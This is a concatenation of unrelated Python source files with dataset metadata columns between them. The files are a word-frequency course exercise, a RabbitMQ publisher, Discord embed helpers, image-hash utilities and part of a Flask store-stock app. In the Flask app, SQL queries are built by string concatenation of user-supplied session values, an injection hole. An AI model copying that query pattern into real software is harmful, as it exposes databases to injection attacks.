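# service = build('sheets', 'v4', credentials=creds)
# job = GoogleSheetsJobParser(view).parse_document(service, document_id)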
| 43.811429
| 104
| 0.60493
| 1,015
| 7,667
| 4.502463
| 0.214778
| 0.032823
| 0.029759
| 0.020131
| 0.315536
| 0.271554
| 0.234792
| 0.212691
| 0.199125
| 0.199125
| 0
| 0.009472
| 0.32529
| 7,667
| 175
| 105
| 43.811429
| 0.873961
| 0.478805
| 0
| 0.129032
| 0
| 0
| 0.067358
| 0.00709
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0.016129
| 0.048387
| 0
| 0.177419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb3a92014d6912b9f49fb4d369df04c828bdc5f0
| 6,565
|
py
|
Python
|
Week3-Case-Studies-Part1/Language-Processing/Language_Processing.py
|
Lamanova/Harvard-PH526x-Lab
|
168e4c16fa067905142bb6be106277f228d591c5
|
[
"MIT"
] | 7
|
2017-08-13T03:03:55.000Z
|
2022-02-06T17:08:12.000Z
|
Week3-Case-Studies-Part1/Language-Processing/Language_Processing.py
|
Lamanova/Harvard-PH526x-Lab
|
168e4c16fa067905142bb6be106277f228d591c5
|
[
"MIT"
] | null | null | null |
Week3-Case-Studies-Part1/Language-Processing/Language_Processing.py
|
Lamanova/Harvard-PH526x-Lab
|
168e4c16fa067905142bb6be106277f228d591c5
|
[
"MIT"
] | 10
|
2017-09-29T08:22:10.000Z
|
2021-06-17T22:51:59.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 28 22:41:26 2017
@author: lamahamadeh
"""
'''
Case Study about Language Processing
'''
#counting words
#---------------
text = "This is a test text. We're keping this text short to keep things manageable." #test text
#Using loops
#-----------
def count_words(text):
"""count the number of times each word occurs in text (str).
Return dictionary where keys are unique words and values are
word counts. skip punctuations"""
text = text.lower() #lowercase the text so the function counts the same word whether or not it's capitalised
skips = [".", ",", ";", ":", "'", '"'] #skip punctuation so it is not counted as part of the words that come before it
for ch in skips:
text = text.replace(ch,"")
word_counts = {}
for word in text.split(" "):
if word in word_counts: #known word case
word_counts[word] += 1
else:
word_counts[word] = 1 #unknown word case
return word_counts
print(count_words(text))
print(len(count_words("This comprehension check is to check for comprehension.")))#first quiz question
#------------------------------------------------------------------------------
#using collections module
#-------------------------
from collections import Counter
def count_words_fast(text):
"""count the number of times each word occurs in text (str).
Return dictionary where keys are unique words and values are
word counts. skip punctuations"""
text = text.lower() #lowercase the text so the function counts the same word whether or not it's capitalised
skips = [".", ",", ";", ":", "'", '"'] #skip punctuation so it is not counted as part of the words that come before it
for ch in skips:
text = text.replace(ch,"")
word_counts = Counter(text.split(" "))
return word_counts
print(count_words_fast)
print(count_words(text)==count_words_fast(text))
print(count_words(text) is count_words_fast(text))#second quiz question
#------------------------------------------------------------------------------
#read a book
#-------------
def read_book(title_path):
"""Read a book and return it as a string"""
with open(title_path, "r", encoding = "utf8") as current_file: #encoding = "utf8" causes a problem when running the code in Python 2.7. However, it runs normally when using Python 3.5.
text = current_file.read()
text = text.replace("\n","").replace("\r","")
return text
text = read_book('/Users/ADB3HAMADL/Desktop/Movies/English/Nora Ephron/You Have Got Mail.txt')#read a book from its path
print(len(text))#number of characters in the book
#if there is a famous/wanted line in the book we can use the 'find' method to find it
ind = text.find("go to the mattresses")
print(ind) #print the index number of the famous/wanted sentence
sample_text = text[ind : ind + 953] #slice the paragraph that contains the famous line
print(sample_text) #print the whole chosen paragraph
#------------------------------------------------------------------------------
#Counting the number of unique words
#------------------------------------
def word_stats(word_counts):
"""return the number of unique words and word frequencies"""
num_unique = len(word_counts) #calculate the number of unique words in the text
counts = word_counts.values() #calculate the frequency of each word in the text
return(num_unique,counts)
text = read_book('/Users/ADB3HAMADL/Desktop/Movies/English/Nora Ephron/You Have Got Mail.txt')
word_counts = count_words(text)
(num_unique, counts) = word_stats(word_counts)
print(num_unique) #print the number of unique number of words in the text
print(sum(counts)) #print the sum of the frequency of each word in the text
#------------------------------------------------------------------------------
#Reading multiple files
#-----------------------
import os #to read directories
movie_dir = "/Users/ADB3HAMADL/Desktop/movies" #tells us how many directories in the book directory
import pandas as pd
'''
Pandas example of how to create a dataframe:
--------------------------------------------
import pandas as pd
table = pd.DataFrame(columns = ("name" , "age"))
table.loc[1] = "James", 22
table.loc[2] = "Jess", 32
print(table)
'''
stats = pd.DataFrame(columns = ("Language" , "Director" , "Title" , "Length" , "Unique")) #this creates an empty dataframe
#with empty table elements with 5 columns
#To put data in the table
title_num =1
for Language in os.listdir(movie_dir):
for Director in os.listdir(movie_dir + "/" + Language):
for Title in os.listdir(movie_dir + "/" + Language + "/" + Director):
inputfile = movie_dir + "/" + Language + "/" + Director + "/" + Title
print(inputfile)
text = read_book(inputfile)
(num_unique, counts) = word_stats(count_words(text))
stats.loc[title_num ] = Language , Director.title(), Title.replace(".txt", " ") , sum(counts) , num_unique #.title() here capitalises the first letter from the first and last name of the director. If we want to capitalise only the first letter, we can use .capitalize().
title_num += 1
print(stats) #print the created dataframe
print(stats.head()) #print the top 5 lines
print(stats.tail()) #print the last 5 lines
print(stats[stats.Language == "English"]) #print the number of entries for language English (a subset from the whole dataframe)
#------------------------------------------------------------------------------
#Plotting Book Statistics
#-------------------------
import matplotlib.pyplot as plt
plt.plot(stats.Length, stats.Unique, "bo")
#OR we can write plt.plot(stats['Length'], stats['Unique'])
plt.loglog(stats.Length, stats.Unique, "bo") #it is a straight line, which suggests data modelling strategies that we might use
plt.figure(figsize = (10,10))
subset = stats[stats.Language == "English"] #extract a subset that has only the rows with English Language
plt.loglog(subset.Length, subset.Unique, "o", label = "English", color = "blue")
subset = stats[stats.Language == "French"] #extract a subset that has only the rows with French Language
plt.loglog(subset.Length, subset.Unique, "o", label = "French", color = "red")
plt.legend()
plt.xlabel("Movie Length")
plt.ylabel("Number of unique words")
plt.savefig("lang_plot.pdf")
#------------------------------------------------------------------------------
#
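# A quick illustrative check of count_words/count_words_fast defined above
# (toy input, shown doctest-style):
# >>> count_words_fast("One fish, two fish.")
# Counter({'fish': 2, 'one': 1, 'two': 1})
# >>> count_words("One fish, two fish.") == count_words_fast("One fish, two fish.")
# True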
| 36.071429
| 282
| 0.6262
| 880
| 6,565
| 4.609091
| 0.292045
| 0.034517
| 0.018984
| 0.016765
| 0.341963
| 0.302761
| 0.259862
| 0.259862
| 0.244576
| 0.203649
| 0
| 0.007909
| 0.17182
| 6,565
| 181
| 283
| 36.270718
| 0.738091
| 0.46489
| 0
| 0.157895
| 0
| 0
| 0.156619
| 0.038915
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.052632
| 0
| 0.144737
| 0.197368
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3485a97e04399f112e63493e9a7df6b69342ec0c
| 313
|
py
|
Python
|
Microservices/Events/Events/producer.py
|
satyap54/Microservices-Architecture
|
be397b351a61eb21229fad021590fcb0b07b8089
|
[
"MIT"
] | null | null | null |
Microservices/Events/Events/producer.py
|
satyap54/Microservices-Architecture
|
be397b351a61eb21229fad021590fcb0b07b8089
|
[
"MIT"
] | null | null | null |
Microservices/Events/Events/producer.py
|
satyap54/Microservices-Architecture
|
be397b351a61eb21229fad021590fcb0b07b8089
|
[
"MIT"
] | null | null | null |
import asyncio
import aiormq
async def publish(method, event_id):
connection = await aiormq.connect('')
channel = await connection.channel()
body = bytes(str(event_id), 'utf-8')
await channel.basic_publish(
body, exchange='', routing_key='admin'
)
await connection.close()
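# Hypothetical driver for the coroutine above; note that aiormq.connect('')
# needs a real broker URL in practice (e.g. 'amqp://guest:guest@localhost/'):
# asyncio.run(publish('event.created', 42))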
| 20.866667
| 46
| 0.664537
| 37
| 313
| 5.513514
| 0.648649
| 0.068627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004082
| 0.217252
| 313
| 14
| 47
| 22.357143
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0.031949
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3485c332458e998d42d6f67bb82de0ba508582c0
| 8,473
|
py
|
Python
|
timezone/embeds.py
|
duanegtr/legendv3-cogs
|
ffde1452a75ad42b4f6511b612ce486e96fcd6de
|
[
"MIT"
] | 10
|
2020-05-25T13:32:30.000Z
|
2022-02-01T12:33:07.000Z
|
timezone/embeds.py
|
darcyle/tl-cogs
|
6b13c4a6247115571c5a2bb6ea98ed1fe2d44d79
|
[
"MIT"
] | 2
|
2020-05-23T22:53:07.000Z
|
2020-08-09T11:28:12.000Z
|
timezone/embeds.py
|
darcyle/tl-cogs
|
6b13c4a6247115571c5a2bb6ea98ed1fe2d44d79
|
[
"MIT"
] | 7
|
2020-05-18T17:37:33.000Z
|
2022-01-13T04:08:05.000Z
|
"""Embeds for Timezone Legends discord bot."""
import time
import discord
from dateutil.parser import parse # pip install python-dateutil
from pytz import timezone
from datetime import datetime
class Timezone_Embeds:
def __init__(self, description=None, color=0x5c0708, show_footer=True, show_timestamp=True, show_thumbnail=True):
if not show_timestamp:
self.embed = discord.Embed(colour=discord.Colour(color))
else:
if not description:
self.embed = discord.Embed(colour=discord.Colour(color),
timestamp=datetime.utcfromtimestamp(time.time()))
else:
self.embed = discord.Embed(colour=discord.Colour(color),
description=description,
timestamp=datetime.utcfromtimestamp(time.time()))
if show_thumbnail:
#self.embed.set_thumbnail(url="https://cdn.iconscout.com/icon/premium/png-256-thumb/global-time-zone-1480117-1253197.png")
#self.embed.set_thumbnail(url="https://tuccitime.com/modules/xipblog/img/large-time.jpg")
self.embed.set_thumbnail(url="https://cdn.clipart.email/1cb9490f73d090921ded3aa2b1c2bf1f_different-time-zone-no-problem_513-510.png")
if show_footer:
self.embed.set_footer(text="Bot by Vanhorn | Academy",
icon_url="https://vignette.wikia.nocookie.net/clashroyale/images/4/42/GraveyardCard.png/revision/latest/top-crop/width/360/height/450?cb=20171212204803")
def set_title(self, name, icon_url):
self.embed.set_author(name=name,
url="https://discordapp.com/channels/374596069989810176/374597178989215757",
icon_url=icon_url)
async def events(ctx, event_list):
tze = Timezone_Embeds(description="Listing all Events that matched your request (**if any**)")
tze.set_title("Events", "https://www.kindpng.com/picc/m/246-2465899_upcoming-events-icon-calendar-icon-png-transparent-png.png")
for event_name, event_time, time_to_event, time_delta in event_list:
tze.embed.add_field(name="Event", value=f"**{event_name}**", inline=True)
tze.embed.add_field(name="Local Time", value=f"{event_time}", inline=True)
tze.embed.add_field(name="Time Left", value=f"**{time_to_event}**", inline=True)
await ctx.send(embed=tze.embed)
async def created_event(ctx, event, event_id, event_time):
tze = Timezone_Embeds(show_thumbnail=False)
tze.set_title("Event Created", "https://cdn2.vectorstock.com/i/1000x1000/70/11/event-schedule-icon-vector-26627011.jpg")
tze.embed.add_field(name="Name", value=f"**{event}**", inline=True)
tze.embed.add_field(name="ID", value=f"**{event_id}**", inline=True)
tze.embed.add_field(name="When", value=f"{event_time}", inline=True)
await ctx.send(embed=tze.embed)
async def removed_event(ctx, event_id, event):
"""
{'event': 'Test Event', 'when': '2020-05-07T15:46:17.156085+00:00', 'tz': 'America/New_York'}
"""
tze = Timezone_Embeds(show_thumbnail=False)
tze.set_title("Event Removed", "https://cdn2.vectorstock.com/i/1000x1000/70/11/event-schedule-icon-vector-26627011.jpg")
event_name = event['event']
event_tz = event['tz']
fmt = "**%H:%M** %d-%B-%Y **%Z (UTC %z)**"
event_time = parse(event['when']).astimezone(timezone(event_tz)).strftime(fmt)
tze.embed.add_field(name="Name", value=f"**{event_name}**", inline=True)
tze.embed.add_field(name="ID", value=f"**{event_id}**", inline=True)
tze.embed.add_field(name="When", value=f"{event_time}", inline=True)
tze.embed.add_field(name="TZ", value=f"{event_tz}", inline=True)
await ctx.send(embed=tze.embed)
async def show_events(ctx, event_list):
for idx in range(0, len(event_list)):
event_id, event_name, event_time, event_tz, time_delta = event_list[idx]
tze = Timezone_Embeds(show_footer=True if idx == len(event_list)-1 else False,
show_timestamp=True if idx == 0 else False,
show_thumbnail=True if idx == 0 else False)
tze.set_title(f"Event ({event_id})",
"https://images.squarespace-cdn.com/content/v1/5a5ced468a02c79bfe4829bf/1516978000404-CVQ1CO95BEFJ7W2FTGDM/ke17ZwdGBToddI8pDm48kBPauUSMbKdP-TlqMma_x0ZZw-zPPgdn4jUwVcJE1ZvWEtT5uBSRWt4vQZAgTJucoTqqXjS3CfNDSuuf31e0tVFzDLvN5UbLOifpAePtRMTrCg1jr8OpcUFdGiHX6l_hRjFvbuqF0GUInBxxtVhBOn4/events-icon-website-gray.png")
tze.embed.add_field(name="Name", value=f"**{event_name}**", inline=True)
tze.embed.add_field(name="When", value=f"{event_time}", inline=True)
tze.embed.add_field(name="TZ", value=f"**{event_tz}**", inline=True)
await ctx.send(embed=tze.embed)
async def compare(ctx, display_name, other_time, time_amt, position_text):
tze = Timezone_Embeds()
tze.set_title("User TZ Compare", "https://cdn3.iconfinder.com/data/icons/calendar-23/100/Calendar-15-512.png")
tze.embed.add_field(name=f"{display_name}'s time", value=f"**{other_time}**", inline=True)
tze.embed.add_field(name="Which is", value=f"**{time_amt}{position_text}**", inline=True)
await ctx.send(embed=tze.embed)
async def iso(ctx, code=None, tz=None):
tze = Timezone_Embeds()
tze.set_title("ISO", "https://images.assetsdelivery.com/compings_v2/aalbedouin/aalbedouin1808/aalbedouin180806226.jpg")
if not code or not tz:
tze.embed.add_field(name=f"**{code}** is invalid. For a full list, see here:", value="[Timezone Link](<https://en.wikipedia.org/wiki/List_of_ISO_3166_country_codes>)", inline=False)
else:
timezones = '\n'.join(tz)
tze.embed.add_field(name=f"Supported timezones for **{code}**:", value=f"**{timezones}**", inline=False)
tze.embed.add_field(name="**NOTE**", value=f"\n**Use** `{ctx.prefix}time tz Continent/City` **to display the current time in that timezone.**", inline=False)
await ctx.send(embed=tze.embed)
async def me(ctx, usertime, time=None):
tze = Timezone_Embeds()
if usertime and time:
tze.embed.add_field(name=f"Your current timezone is:", value=f"**{usertime}.\nThe current time is: {time}", inline=False)
else:
tze.embed.add_field(name=f"You haven't set your timezone yet...",
value=f"Do `{ctx.prefix}time me Continent/City`\nsee [Timezones](<https://en.wikipedia.org/wiki/List_of_tz_database_time_zones>)")
await ctx.send(embed=tze.embed)
async def generic_embeds(ctx, field, value, description=None):
tze = Timezone_Embeds(description)
tze.embed.add_field(name=field, value=value)
await ctx.send(embed=tze.embed)
"""
embed = discord.Embed(colour=discord.Colour(0x5c0708), description="Listing all Events that matched your request (**if any**)", timestamp=datetime.utcfromtimestamp(time.time()))
embed.set_author(name="Events",
url="https://discordapp.com/channels/374596069989810176/374597178989215757",
icon_url="https://www.kindpng.com/picc/m/246-2465899_upcoming-events-icon-calendar-icon-png-transparent-png.png")
embed.set_thumbnail(url="https://cdn.iconscout.com/icon/premium/png-256-thumb/global-time-zone-1480117-1253197.png")
embed.set_footer(text="Bot by Vanhorn | Academy",
icon_url="https://vignette.wikia.nocookie.net/clashroyale/images/4/42/GraveyardCard.png/revision/latest/top-crop/width/360/height/450?cb=20171212204803")
for event_name, event_time, time_to_event in event_list:
embed.add_field(name="Event", value=f"**{event_name}**", inline=True)
embed.add_field(name="Local Time", value=f"**{event_time}**", inline=True)
embed.add_field(name="Time Left", value=f"**{time_to_event}**", inline=True)
#print(embed.to_dict())
await ctx.send(embed=embed)
"""
"""
[x] create_event Creates an event in your timezone, or in a given t...
[x] events Lists all registered events.
[x] show_events Lists all registered events.
[x] remove_event Erases an event if the given ID is found.
[x] compare Compare your saved timezone with another user's timezone.
[x] iso Looks up ISO3166 country codes and gives you a supported ti...
[x] me Sets your timezone.
[x] set Allows the mods to edit timezones.
[x] tell Tells you what the time will be in the given timezone.
[x] tz Gets the time in any timezone.
[x] user Shows the current time for user.
"""
| 57.639456
| 331
| 0.688304
| 1,189
| 8,473
| 4.779647
| 0.232969
| 0.040824
| 0.054901
| 0.071793
| 0.535809
| 0.506599
| 0.45117
| 0.426535
| 0.373922
| 0.342425
| 0
| 0.051293
| 0.164759
| 8,473
| 146
| 332
| 58.034247
| 0.751731
| 0.03281
| 0
| 0.301075
| 0
| 0.096774
| 0.324392
| 0.004549
| 0
| 0
| 0.001255
| 0
| 0
| 1
| 0.021505
| false
| 0
| 0.053763
| 0
| 0.086022
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34895fa122da2aa59b08dae55bc7b95297e3503a
| 1,521
|
py
|
Python
|
utils/commonutils.py
|
rupakc/Storyweaver
|
9a6ec1c040a09f730cc6f32ce385f44a79d28663
|
[
"BSL-1.0"
] | null | null | null |
utils/commonutils.py
|
rupakc/Storyweaver
|
9a6ec1c040a09f730cc6f32ce385f44a79d28663
|
[
"BSL-1.0"
] | null | null | null |
utils/commonutils.py
|
rupakc/Storyweaver
|
9a6ec1c040a09f730cc6f32ce385f44a79d28663
|
[
"BSL-1.0"
] | null | null | null |
import hashlib
import shutil
import requests
import os
from config import constants
def get_sha_hash(content):
sha = hashlib.sha1()
sha.update(content)
return sha.hexdigest()
def download_image(image_url,filename_to_save):
response = requests.get(image_url, stream=True)
with open(filename_to_save, 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
def get_image_hash_list(image_data_directory_path):
image_list = os.listdir(image_data_directory_path)
image_name_without_extension_list = list([])
for image_name in image_list:
extension_index = image_name.find('.')
if extension_index != -1:
image_name_without_extension_list.append(image_name[:extension_index])
return image_name_without_extension_list
def get_supported_image_hashes(image_hash_name_list):
hash_title_dict = dict({})
filtered_image_hash_dict = dict({})
with open(constants.TITLE_HASH_MAP, 'r') as title_hash_file:
title_hash_list = title_hash_file.read().split('\n')
for title_hash in title_hash_list:
sep_index = title_hash.find('=')
if sep_index != -1:
title = title_hash[:sep_index].strip()
hash_value = title_hash[sep_index+1:].strip()
hash_title_dict[hash_value] = title
for image_name in image_hash_name_list:
if image_name in hash_title_dict.keys():
filtered_image_hash_dict[image_name] = hash_title_dict[image_name]
return filtered_image_hash_dict
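# Illustrative check of get_sha_hash (note that hashlib's update() requires
# bytes, so str content must be encoded by the caller first):
# >>> get_sha_hash(b"hello")
# 'aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d'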
| 33.065217
| 82
| 0.721893
| 216
| 1,521
| 4.666667
| 0.291667
| 0.089286
| 0.051587
| 0.074405
| 0.172619
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003247
| 0.190007
| 1,521
| 45
| 83
| 33.8
| 0.814935
| 0
| 0
| 0
| 0
| 0
| 0.004602
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.138889
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
348a2b80711dded6c85af5b308b4122d1e73013c
| 14,635
|
py
|
Python
|
flask_app.py
|
wacovidhackathon/TPCraze
|
57a9485a008536f6326e29328df6af6d29045a6d
|
[
"MIT"
] | null | null | null |
flask_app.py
|
wacovidhackathon/TPCraze
|
57a9485a008536f6326e29328df6af6d29045a6d
|
[
"MIT"
] | null | null | null |
flask_app.py
|
wacovidhackathon/TPCraze
|
57a9485a008536f6326e29328df6af6d29045a6d
|
[
"MIT"
] | null | null | null |
import time, os
import tomtomSearch
from flask_bootstrap import Bootstrap
from flask import Flask, render_template, request, redirect, flash, session, jsonify, url_for
from flask_wtf import FlaskForm
from wtforms import StringField, BooleanField, SubmitField, IntegerField, SelectField, RadioField
from wtforms.validators import DataRequired
from datetime import datetime
from flaskext.mysql import MySQL
from pytz import timezone
'''
TODO:
-add so user can input address as well
- fix the full page 2 columns
- add information about the store
- integrate the user
- authenticate the managers
'''
class LocationForm(FlaskForm):
address = StringField('Address', validators=[DataRequired()])
item_option = SelectField('item_option', choices=[('1', 'Toilet Paper'), ('2', 'Hand Sanitizer')])
distance_option = SelectField('distance_option',
choices=[('1', '1 km'), ('5', '5 km'), ('10', '10 km'),
('15', '15 km'), ('20', '20 km')])
submit = SubmitField('Search')
class StatusForm(FlaskForm):
status_option = SelectField('status_option',
choices=[('1', 'Full Stock'), ('2', 'Majority Remaining'), ('3', 'Half Remaining'),
('4', 'Few Remaining'), ('5', 'None Remaining')])
item_option = SelectField('item_option', choices=[('1', 'Toilet Paper'), ('2', 'Hand Sanitizer')])
submit = SubmitField('Submit Status')
class StoreForm(FlaskForm):
stores = RadioField('stores', choices=[])
submit = SubmitField('View')
class optionForm(FlaskForm):
find_item = SubmitField('Find an Item')
provide_status = SubmitField('Provide Status')
# declaring app name
app = Flask(__name__)
mysql = MySQL()
# MySQL configurations
app.config['MYSQL_DATABASE_USER'] = os.environ["MYSQL_USER"]
app.config['MYSQL_DATABASE_PASSWORD'] = os.environ["MYSQL_PW"]
app.config['MYSQL_DATABASE_DB'] = os.environ["MYSQL_DB"]
app.config['MYSQL_DATABASE_HOST'] = os.environ["MYSQL_URL"]
mysql.init_app(app)
def getStore(latitude, longitude): # get stores from coordinates
db = mysql.connect()
cursor = db.cursor()
store = []
ids = []
addresses = []
for i in range(len(latitude)):
query = 'SELECT name FROM all_stores WHERE lat = ' + str(latitude[i]) + ' AND lon = ' + str(longitude[i]) + ';'
cursor.execute(query)
data_store = cursor.fetchall()
query = 'SELECT id FROM all_stores WHERE lat = ' + str(latitude[i]) + ' AND lon = ' + str(longitude[i]) + ';'
cursor.execute(query)
data_id = cursor.fetchall()
query = 'SELECT freeFormAddress FROM all_stores WHERE lat = ' + str(latitude[i]) + ' AND lon = ' + str(
longitude[i]) + ';'
cursor.execute(query)
data_address = cursor.fetchall()
# rcount = len(data)
# print(rcount)
if (len(data_store) != 0):
store.append(data_store[0][0])
ids.append(data_id[0][0])
addresses.append((data_address[0][0]))
cursor.close()
db.close()
return store, ids, addresses
def getItemStatus(selected_item, store_id, num_to_average): #get the status of the selected item using moving average
db = mysql.connect()
cursor = db.cursor()
query = "SELECT rating FROM status_list WHERE id = '" + str(store_id) + "' AND item = " + str(selected_item) +";"
cursor.execute(query)
status_values = []
status = cursor.fetchall()
moving_average = 0
for x in range(len(status)):
i = len(status) - x - 1
status_values.append(5-(status[i][0])+1)
if len(status_values) != 0:
for i in range(min(len(status_values),num_to_average)):
moving_average += status_values[i]
moving_average = moving_average/min(num_to_average, len(status_values))
cursor.close()
db.close()
return round(moving_average)
def getManagerList(raw_manager):
manager_lst = []
for x in range(len(raw_manager)):
i = len(raw_manager) - x - 1
manager_lst.append(raw_manager[i][0])
return manager_lst
def parseMessage(store, raw_item, raw_rating, raw_date, raw_user): # get status messages
messages = []
type = []
rating_choices = ['Full Stock', 'Majority Remaining', 'Half Remaining', 'Few Remaining', 'None Remaining']
item_choices = ['Toilet Paper', 'Hand Sanitizer']
color_array = []
for x in range(len(raw_rating)):
i = len(raw_rating) - x - 1
if raw_user[i][0] == None:
new_message = '' + raw_date[i][0] + ' Status of ' + item_choices[
raw_item - 1] + ' at ' + store + ': ' + rating_choices[int(raw_rating[i][0]) - 1]
else:
new_message = '' + raw_date[i][0] + ' Status of ' + item_choices[raw_item - 1] + ' at ' + store + ': ' + rating_choices[int(raw_rating[i][0]) - 1] + " - " + raw_user[i][0]
messages.append(new_message)
color_array.append(int(raw_rating[i][0]))
type.append(int(raw_item))
return messages, color_array, type
def getAddress(address): # get basic store information for landing page
message = 'Address: ' + address
return message
def getPhone(phone):
phone_formatted = ''
if len(phone)>0:
phone_formatted = phone[5:14] + '-' + phone[14:18]
else:
phone_formatted = 'Unavailable'
message = 'Phone: ' + phone_formatted
return message
def getItem(key):
items = {'1': 'Toilet Paper', '2': 'Hand Sanitizer'}
return items[key]
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
data = request.get_json()
session['user'] = data['user_email']
session['user_store_id'] = data['store_id']
return "Forbidden!"
@app.route('/location', methods=['GET', 'POST'])
def location():
form = LocationForm()
if form.validate_on_submit():
flash('Item requested from the user {}'.format(form.item_option.data))
flash('Item requested from the user {}'.format(form.distance_option.data))
flash('Item requested from the user {}'.format(form.address.data))
session['selected_item'] = form.item_option.data
session['distance'] = form.distance_option.data
user_lat, user_lon = tomtomSearch.geo(form.address.data)
lat_lst, lon_lst = tomtomSearch.search(user_lat, user_lon,1000*int(session.get('distance')),10*int(session.get('distance')))
stores, ids, addresses = getStore(lat_lst, lon_lst)
session['stores'] = []
session['ids'] = []
session['addresses'] = []
session['stores'] = stores
session['ids'] = ids
session['addresses'] = addresses
return redirect('/store')
return render_template('location.html', title='Location', form = form)
@app.route('/store', methods=['GET', 'POST'])
def stores():
form = StoreForm()
if request.method == 'POST':
#flash('Status requested from the user {}'.format(form.stores.data))
option = int(request.form['options'])
print(session.get('stores'))
session['selected_store'] = session.get('stores')[option]
session['selected_id'] = session.get('ids')[option]
return redirect('/item-status')
status_values = []
radio = {}
all_stores = []
store_info = {}
store_count = []
for i in range(len(session.get('stores'))): # append radio button options
cur_status = getItemStatus(session.get('selected_item'), session.get('ids')[i], 1)
if session.get('selected_option') == 'find' and cur_status==0:
continue
else:
#form.stores.choices.append((str(i), (session.get('stores')[i] + ' - ' + session.get('addresses')[i])))
all_stores.append((session.get('stores')[i] + ' - ' + session.get('addresses')[i]))
store_info[i] =[session.get('stores')[i],session.get('ids')[i],session.get('addresses')[i]]
#radio[i] = str(session.get('stores')[i] + ' - ' + session.get('addresses')[i])
store_count.append(i)
status_values.append(cur_status)
#form.stores.choices = [x for _, x in sorted(zip(status_values, form.stores.choices), reverse=True)]
all_stores = [x for _, x in sorted(zip(status_values, all_stores), reverse=True)]
store_count = [x for _, x in sorted(zip(status_values, store_count), reverse=True)]
sorted_info = []
for i in range(len(store_count)):
sorted_info.append(store_info[store_count[i]])
session['stores'] = [item[0] for item in sorted_info]
session['ids'] = [item[1] for item in sorted_info]
session['addresses'] = [item[2] for item in sorted_info]
status_values.sort(reverse=True)
print(session.get('stores'))
for i in range(len(status_values)):
s = str(session.get('stores')[i] + ' - ' + session.get('addresses')[i])
radio[i] = s
form.stores.choices.append((str(i), s))
storeFound = True
print(radio)
if len(status_values) == 0:
storeFound = False
status_types = ['Full Stock', 'Majority Remaining', 'Half Remaining','Few Remaining', 'None Remaining']
return render_template("store.html", type_query = session.get('selected_option'),storeFound = storeFound,status_types=status_types, dist = int(session.get('distance')),len=len(form.stores.choices), form=form, status_values=status_values, radio = radio, selected_item_index = int(session.get('selected_item')), selected_item_name = getItem(session.get('selected_item')))
@app.route('/item-status', methods=['GET', 'POST'])
def status():
status_form = StatusForm()
if request.method == 'POST':
user_email = ' '
print()
if session.get('user') == '':
return redirect("/item-status")
db = mysql.connect()
cursor = db.cursor()
user_email = session.get('user')
flash('Status requested from the user {}'.format(status_form.status_option.data))
#flash('Status requested from the user {}'.format(status_form.item_option.data))
tz = timezone('US/Eastern')
now = datetime.now(tz)
date_now = now.strftime("%m/%d/%Y %H:%M:%S")
# add manager
query = ''
if session.get('user_store_id') == session.get('selected_id'):
query = "INSERT INTO status_list(date, item, rating, manager, store, id, user) VALUES('" + date_now + "'," + session.get('selected_item') + "," + status_form.status_option.data + ", 1, '" + session['selected_store'] + "', '" + session['selected_id'] + "','"+ user_email+"');"
else:
query = "INSERT INTO status_list(date, item, rating, manager, store, id, user) VALUES('" + date_now + "'," + session.get('selected_item') + "," + status_form.status_option.data + ", 0, '" + session['selected_store'] + "', '" + session['selected_id'] + "','"+ user_email+"');"
cursor.execute(query)
cursor.execute("COMMIT;")
time.sleep(0.5)
cursor.close()
db.close()
return redirect('/item-status')
db = mysql.connect()
cursor = db.cursor()
get_query = "SELECT rating FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_rating = cursor.fetchall()
get_query = "SELECT date FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_date = cursor.fetchall()
get_query = "SELECT user FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_user = cursor.fetchall()
get_query = "SELECT manager FROM status_list WHERE item = " + session.get('selected_item') +" AND id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_manager = cursor.fetchall()
# get basic store info
get_query = "SELECT phone FROM all_stores WHERE id = '" + session['selected_id'] + "';"
